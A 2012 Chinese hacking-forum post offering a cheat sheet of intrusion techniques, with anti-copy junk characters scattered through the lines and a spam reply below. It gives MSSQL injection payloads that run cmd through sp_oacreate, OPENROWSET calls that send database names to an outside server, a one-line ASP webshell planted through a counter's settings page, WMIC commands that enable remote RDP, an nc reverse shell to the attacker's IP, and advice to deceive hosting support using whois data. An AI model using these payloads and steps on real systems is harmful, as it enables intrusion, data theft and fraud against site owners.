找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3613|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
, o& u, d7 [! D3 Y" W2 Z2 m
5 c0 o1 A! k  S6 L" U! T
2 o6 I2 w$ U# Z3 @: K  sSA点数据库分离搞法+语句:
3 o. v- r6 b$ L) A5 `+ b/ i3 ?2 `/ S# t0 {
注射点不显错,执行下面三条语句页面都返回正常。
  s$ W3 V/ s8 u2 Y: n, Y, Mand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
9 {- b: K* t: B! u7 Uand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'): q& Z, u* \. i: p7 J. ?
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
: |% L# t9 H/ H可以列目录,判断系统为2000,web与数据库分离
3 [+ p% f. Q; J4 G遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。, M# ^$ T+ o! M7 k! U7 X
在注射点上执行3 e" i$ H6 X& t" \: k( D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--. u% o  Z/ \" J. f
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
2 `2 B: v1 ^+ R0 D: \0 Q% t还有我用NC监听得其他端口都没有得到IP。
8 G5 j) G2 ^2 Y0 F5 ~
* H1 h& L+ G$ {/ y8 c/ t通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) M2 }/ E" d# Z; _7 ^2 T
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--- Y8 T- L7 }& `( F# w

) l9 A( X3 C8 a3 L" d;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--+ ]; w6 U! h& J5 Z! Q
/ y4 J1 @$ |/ A1 ^' K# R
现在就猜想是不是数据库是内网而且不能连外网。! Z# p; O, B8 W% s0 I

" F2 D: o7 r9 l. _  i$ H2 \. ~6 C- d6 @# f! y
access导出txt文本代码
9 Q& z1 ]3 @+ tSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
5 m) Q* v' y# |7 j1 U  L3 i) F# \; g1 D. F! [  n, m% F6 w: ~) R

" O7 s4 A. p" k9 r* Y( ~+ w0 Y7 `: c3 M  u, c: Q% C/ ?! @
自动跳转到指定网站代码头: U" d* U' k; T5 I; c
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
# K" v8 I. l% Y2 E4 g1 B5 I
, b  G6 H6 t- S8 I
+ b" f  [% I8 _0 m% L7 y2 k' q入侵java or jsp站点时默认配置文件路径:, [% k* p4 ]+ a8 s  m! E
\web-inf\web.xml
8 K8 t  ]# J8 _7 [, u7 \6 ^: d2 D( _( Jtomcat下的配置文件位置:
% s; H8 B* K- h- _' g\conf\server.xml            (前面加上tomcat路径)9 h7 z  E3 {( B$ a5 O/ L
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
" T( s2 F. D$ {
: \( w+ h7 U- D8 t; v2 b0 t9 y, m4 J) s8 [

5 c( e% P' t" x) h: h检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
- s8 B0 j$ V/ Q3 C! a-1%23) T4 [: W+ \) z) n4 H" S: y; O% O' h; G9 b
> # ~5 e8 G6 T4 r! Q
<4 J+ N0 P' k  X2 Z# ]! X
1'+or+'1'='10 r! z* }3 g* x
id=8%bf1 W) o$ s' O$ [2 r* M1 j8 a
. J7 q6 d7 G- o
全新注入点检测试法:( v' q/ `% B1 N# y
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
; Y$ T1 u$ C- `+ H9 X! A3 ?( k2 l4 T# `& N- o1 m1 ]
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
, I1 z6 V0 v& W" h4 I$ s
7 U) Q/ n8 }5 h& k% H搜索型注入判断方法:
! I) z7 F" N; n9 U- J" c' L北京%' and '1'='1' and '%'='
0 C: j) V& @, P: W' b! {北京%' and '1'='2' and '%'='
- M  P0 N" L; A  i
1 S$ T5 z0 Y$ F  p: _! y1 t
( ?# E- K3 A) m+ l3 @" w+ yCOOKIES注入:6 z* v3 c5 ?( l! \+ [% e: d# w

5 Z8 N( _" M  W6 K* X9 j. {# h; Njavascript:alert(document.cookie="id="+escape("51 and 1=1"));
. U& k: W, J+ _" |  r7 D) N
' }7 j( Z# b' o6 w5 j2000专业版查看本地登录用户命令:+ M! r% ?7 D9 s8 ]2 b1 Y0 A* j/ {
net config workstation
% U) F$ e' S' Y% ?6 d' G/ S0 m4 V! V& |% t% V4 _0 p% m5 E$ L

1 \+ ~( d; m4 m$ s$ t2003下查看ipsec配置和默认防火墙配置命令:
0 Y# `& ]7 P+ Tnetsh firewall show config
3 ~5 {( f4 i: N, `2 e  ?! g9 F# znetsh ipsec static show all
$ W/ ^" C0 X7 O4 J
$ E$ H3 D8 k. I; P# \: w" K2 j不指派指定策略命令:/ \" w& c7 v0 f
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
( m1 \0 v8 s& F5 l; Wnetsh ipsec static show policy all  显示策略名
/ I9 K, f7 ~: c  ?3 }- L' X1 x
% d0 ?  |/ C8 B# T0 E
$ c7 G0 [+ k" a/ G; I, A2 H猜管理员后台小技巧:7 T* z  M$ Y& u2 n+ W
admin/left.asp 8 D! L; A7 l' p
admin/main.asp
9 }9 i+ O& V, q2 uadmin/top.asp# T7 \2 X% `4 g& j1 }, I
admin/admin.asp 9 |& q5 a8 \) a
会现出菜单导航,然后迅雷下载全部链接
" S! B. C4 A$ D& u8 o6 I
- |5 w7 r- b  a3 [* m
: J' P: n4 n" p' i社会工程学:
6 G; P  H% p/ }6 b用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人5 g/ _' C+ u$ {( ^' Z3 k
然后去骗客服
5 I1 }/ s) A; D2 S. }( n2 O' X! X1 M

5 a. Y/ |8 E2 R$ ~: m+ `统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . y% n6 M! I5 R1 i* k
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, % ~% Y1 K- \1 B- u) U
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
+ K, [4 I/ v4 @
8 e3 [5 V7 S( U/ D/ W/ K6 ^
( g* t  e4 u( y: M; d3 L
, f2 m- E7 [  n: F: N8 z5 F6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)1 h# s' c9 U- j9 L$ b) q- R5 t2 t+ p
: W8 n: [4 s6 ?$ O8 A+ t5 f

, ^; t( H6 t/ x+ a
% i3 F8 X; c9 ]8 a6 \* ]: b8 n/ UCMD加密注册表位置
/ L" ?* h% s6 K0 a' X(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor4 f/ z2 L+ M% V, x9 z- E
AutoRun2 X3 p8 G( ?. M8 f* t
0 J9 F% X7 ]" I% d
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor+ t8 {+ w. D& D' X6 Y5 y9 V3 P
AutoRun) {4 T; |, G* b% ]2 Z% F0 u
# S  {% |; j: B8 D6 O

: W( c4 Z$ i6 T0 P8 R1 L4 W在找注入时搜索Hidden,把他改成test- V9 r" C7 v; k6 b  g! A' ]; x% j
/ d  J, K9 \% }" ?0 [: E3 v7 q
- I; s& U9 ]8 M
( W; n& B1 }5 D/ b6 n7 m3 b
mstsc /v:IP /console - e- ?0 v1 c& W3 h: t
2 b# Y8 d. b8 I
/ g) Q( d. ^6 e- t# ~
一句话开3389:7 ?5 l( K( f9 W, ~
5 I5 Q* h) f. y! G; v, w
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  . I6 x( }9 V8 ~( F4 |) Z
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.1 i0 A- `3 K" @9 ]; N
% L' a3 l; w% S8 A  g1 M

6 x( M' v  ]4 p4 F$ W# n知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
$ X1 ^( z; z# b# q8 R( ^Insert into admin(user,pwd) values('test','test')! B  V. H7 D& n0 G$ O

3 N! B( }) E+ G* n8 B5 _9 s- Z! M
0 ?: u- [2 I1 ~NC反弹
0 L5 H/ l4 H/ _  }先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   ; x8 o0 A  y; `" t
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
% t! C# C2 ?' Y4 [; O' P# r8 m6 S4 w2 S9 q4 R& w

3 M) i( v8 J2 E1 l  g8 f; ?在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
  J% i7 r3 @) ~% S! k6 _; q
; T! v) I; H8 C- ~0 k有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
+ g! P/ l* l" F1 _( A例如:
: f5 C+ h& ^4 q4 C4 u2 ksubst k: d:\www\ 用d盘www目录替代k盘/ h! Q$ A$ f3 K/ d- n! ]
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表